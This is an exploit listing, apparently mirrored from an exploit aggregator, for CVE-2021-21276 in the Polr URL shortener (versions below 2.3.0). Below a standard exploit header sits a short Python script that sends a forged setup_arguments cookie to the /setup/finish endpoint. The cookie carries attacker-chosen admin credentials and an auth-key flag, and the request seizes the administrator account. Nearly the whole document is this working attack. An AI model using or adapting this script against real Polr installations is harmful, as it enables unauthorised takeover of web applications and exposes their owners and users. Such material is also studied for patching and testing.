Exploit for POLR URL 2.3.0 Shortener Admin Takeover CVE-2021-21276

## https://sploitus.com/exploit?id=PACKETSTORM:171743
# Exploit Title: POLR URL 2.3.0 - Shortener Admin Takeover  
# Date: 2021-02-01  
# Exploit Author: p4kl0nc4t <me-at-lcat-dot-dev>  
# Vendor Homepage: -  
# Software Link: https://github.com/cydrobolt/polr  
# Version: < 2.3.0  
# Tested on: Linux  
# CVE : CVE-2021-21276  
  
  
import json  
  
import requests  
  
payload = {  
'acct_username': 'admin',  
'acct_password': 'password',  
'acct_email': 'email@youremail.com',  
'setup_auth_key': True,  
}  
  
r = requests.get('http://localhost/setup/finish',  
cookies={'setup_arguments': json.dumps(payload)})  
print(r.text)